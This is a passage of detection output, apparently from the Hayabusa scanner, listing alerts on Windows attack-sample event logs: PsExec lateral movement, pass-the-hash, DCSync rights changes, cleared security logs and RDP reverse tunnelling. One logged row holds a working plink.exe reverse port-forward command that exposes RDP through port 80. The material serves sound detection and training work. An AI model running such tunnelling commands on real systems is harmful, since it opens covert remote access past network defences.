Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 13:00:10.350 +00:00,IEWIN7,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: blabla.exe | IP Addr: 10.0.2.16 | LID: 0x162630,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 13:00:10.540 +00:00,IEWIN7,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 13:00:10.711 +00:00,IEWIN7,5145,high,LatMov,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 13:00:10.711 +00:00,IEWIN7,5145,high,LatMov,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 13:00:10.711 +00:00,IEWIN7,5145,high,LatMov,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 13:00:10.711 +00:00,IEWIN7,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 13:00:10.711 +00:00,IEWIN7,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 13:00:10.711 +00:00,IEWIN7,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-20 07:00:50.800 +00:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Evas,Security Log Cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_bloodhound.evtx +2019-01-20 07:29:57.863 +00:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Evas,Security Log Cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_psloggedon.evtx +2019-02-02 09:16:52.479 +00:00,ICORP-DC.internal.corp,4776,info,,NTLM Logon To Local Account,User: helpdesk | Computer: evil.internal.corp | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-02 09:17:22.562 +00:00,ICORP-DC.internal.corp,4776,info,,NTLM Logon To Local Account,User: EXCHANGE$ | Computer: EXCHANGE | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-02 09:17:22.563 +00:00,ICORP-DC.internal.corp,4624,info,,Logon Type 3 - Network,User: EXCHANGE$ | Computer: EXCHANGE | IP Addr: 192.168.111.87 | LID: 0x24daa6,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-02 09:17:22.563 +00:00,ICORP-DC.internal.corp,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-02 09:17:27.629 +00:00,ICORP-DC.internal.corp,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-02 09:17:27.629 +00:00,ICORP-DC.internal.corp,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-13 15:15:04.175 +00:00,PC02.example.corp,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-13 15:15:08.689 +00:00,PC02.example.corp,4624,low,,Logon Type 5 - Service,User: sshd_server | Computer: PC02 | IP Addr: - | LID: 0xe509,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-13 15:19:51.259 +00:00,PC02.example.corp,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: PC02 | IP Addr: 127.0.0.1 | LID: 0x21f73 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-13 15:26:53.356 +00:00,PC02.example.corp,4624,info,,Logon Type 10 - RDP (Remote Interactive),User: IEUser | Computer: PC02 | IP Addr: 127.0.0.1 | LID: 0x45120 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-13 15:26:53.356 +00:00,PC02.example.corp,4624,high,LatMov,RDP Login from Localhost,,rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-13 15:29:40.657 +00:00,PC02.example.corp,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: PC02 | IP Addr: 127.0.0.1 | LID: 0x4a26d | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-13 15:31:19.529 +00:00,PC02.example.corp,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: PC01 | IP Addr: 10.0.2.17 | LID: 0x73d02,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-13 15:31:31.556 +00:00,PC02.example.corp,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: PC01 | IP Addr: 10.0.2.17 | LID: 0x7d4f4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-13 18:01:41.593 +00:00,PC01.example.corp,1102,high,Evas,Security Log Cleared,User: admin01,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-13 18:02:04.426 +00:00,PC01.example.corp,4624,info,,Logon Type 11 - CachedInteractive,User: user01 | Computer: PC01 | IP Addr: 127.0.0.1 | LID: 0x1414c8 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-11-CachedInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-13 18:02:04.426 +00:00,PC01.example.corp,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: PC01$ | Target User: user01 | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-13 18:02:04.526 +00:00,PC01.example.corp,4624,info,,Logon Type 7 - Unlock,User: user01 | Computer: PC01 | IP Addr: - | LID: 0x1414d9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-7-Unlock.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-13 18:02:04.526 +00:00,PC01.example.corp,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: PC01$ | Target User: user01 | IP Address: - | Process: C:\Windows\System32\lsass.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-13 18:03:28.318 +00:00,PC01.example.corp,4688,medium,Exfil | C2,Exfiltration and Tunneling Tools Execution,,rules/sigma/process_creation_builtin/proc_creation_win_exfiltration_and_tunneling_tools_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-13 18:03:28.318 +00:00,PC01.example.corp,4688,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-13 18:04:01.632 +00:00,PC01.example.corp,5156,high,Evas | C2 | LatMov,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-13 18:04:01.632 +00:00,PC01.example.corp,5156,high,Evas | C2 | LatMov,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-13 18:04:43.171 +00:00,PC01.example.corp,4672,info,,Admin Logon,User: admin01 | LID: 0x14871d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-13 18:04:45.905 +00:00,PC01.example.corp,5156,high,Evas | C2 | LatMov,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-13 18:04:45.905 +00:00,PC01.example.corp,5156,high,Evas | C2 | LatMov,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-13 18:04:57.442 +00:00,PC01.example.corp,4672,info,,Admin Logon,User: admin01 | LID: 0x148f5d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-13 18:04:57.462 +00:00,PC01.example.corp,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-13 18:04:57.542 +00:00,PC01.example.corp,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-13 18:04:58.363 +00:00,PC01.example.corp,4672,info,,Admin Logon,User: admin01 | LID: 0x14a321,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-13 18:04:58.363 +00:00,PC01.example.corp,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: PC01$ | Target User: admin01 | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-13 18:04:58.363 +00:00,PC01.example.corp,4624,info,,Logon Type 10 - RDP (Remote Interactive),User: admin01 | Computer: PC01 | IP Addr: 127.0.0.1 | LID: 0x14a321 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-13 18:04:58.363 +00:00,PC01.example.corp,4624,high,LatMov,RDP Login from Localhost,,rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-13 18:04:58.363 +00:00,PC01.example.corp,4624,low,LatMov,Admin User Remote Logon,,rules/sigma/builtin/security/win_admin_rdp_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-13 18:05:00.997 +00:00,PC01.example.corp,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-13 18:05:04.802 +00:00,PC01.example.corp,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-13 18:05:04.873 +00:00,PC01.example.corp,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-16 10:01:46.884 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:1900 () | Dst: 10.0.2.16:57182 () | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:01:50.699 +00:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\plink.exe | PID: 3520 | PGUID: 365ABB72-DD79-5C67-0000-00109C931000,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:02:21.934 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test | Process: C:\Users\IEUser\Desktop\plink.exe | User: PC01\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x26656 | PID: 2312 | PGUID: 365ABB72-DFAD-5C67-0000-0010E0811500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:02:21.934 +00:00,PC01.example.corp,1,medium,Exfil | C2,Exfiltration and Tunneling Tools Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_exfiltration_and_tunneling_tools_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:02:21.934 +00:00,PC01.example.corp,1,high,C2 | LatMov,Suspicious Plink Remote Forwarding,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_plink_remote_forward.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:02:21.934 +00:00,PC01.example.corp,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:02:22.965 +00:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:49185 (PC01.example.corp) | Dst: 10.0.2.18:80 (PC02) | User: PC01\IEUser | Process: C:\Users\IEUser\Desktop\plink.exe | PID: 2312 | PGUID: 365ABB72-DFAD-5C67-0000-0010E0811500,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:02:48.502 +00:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.1:49186 (PC01.example.corp) | Dst: 127.0.0.2:3389 () | User: PC01\IEUser | Process: C:\Users\IEUser\Desktop\plink.exe | PID: 2312 | PGUID: 365ABB72-DFAD-5C67-0000-0010E0811500,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:02:48.502 +00:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.2:3389 () | Dst: 127.0.0.1:49186 (PC01.example.corp) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:02:48.502 +00:00,PC01.example.corp,3,high,LatMov,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/net_connection_win_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:03:02.272 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:80ac:4126:fa58:1b81:64763 (PC01.example.corp) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:03:02.272 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:61400 (PC01.example.corp) | Dst: 224.0.0.252:5355 () | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:03:47.086 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:1900 () | Dst: 10.0.2.16:59304 () | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:03:48.058 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: PC01\IEUser | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x26656 | PID: 2504 | PGUID: 365ABB72-E004-5C67-0000-00107C9B1500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:03:48.078 +00:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\UI0Detect.exe | PID: 2504 | PGUID: 365ABB72-E004-5C67-0000-00107C9B1500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:04.141 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 3444 | PGUID: 365ABB72-E014-5C67-0000-0010FCA01500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:04.151 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 3344 | PGUID: 365ABB72-E014-5C67-0000-00104AA11500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:04.221 +00:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\smss.exe | PID: 3444 | PGUID: 365ABB72-E014-5C67-0000-0010FCA01500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:04.221 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 2516 | PGUID: 365ABB72-E014-5C67-0000-001013A21500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:04.231 +00:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\rdpdd.dll | Status: Valid | Hash: SHA1=853533AD0FD5081E57931D98CF5B1CD4ACBF0601,rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:04.231 +00:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\rdpdd.dll | Status: Valid | Hash: SHA1=853533AD0FD5081E57931D98CF5B1CD4ACBF0601,rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:04.231 +00:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\rdpdd.dll | Signature: Microsoft Windows,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:04.231 +00:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\rdpdd.dll | Signature: Microsoft Windows,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:04.351 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 3780 | PGUID: 365ABB72-E014-5C67-0000-001023A71500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:04.892 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 3064 | PGUID: 365ABB72-E014-5C67-0000-001024B71500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:04.892 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 3204 | PGUID: 365ABB72-E014-5C67-0000-001090B71500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:04.962 +00:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\smss.exe | PID: 3064 | PGUID: 365ABB72-E014-5C67-0000-001024B71500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:04.962 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 2988 | PGUID: 365ABB72-E014-5C67-0000-001094B81500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:05.092 +00:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.1:49187 (PC01.example.corp) | Dst: 127.0.0.2:3389 () | User: PC01\IEUser | Process: C:\Users\IEUser\Desktop\plink.exe | PID: 2312 | PGUID: 365ABB72-DFAD-5C67-0000-0010E0811500,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:05.092 +00:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.2:3389 () | Dst: 127.0.0.1:49187 (PC01.example.corp) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:05.092 +00:00,PC01.example.corp,3,high,LatMov,Suspicious 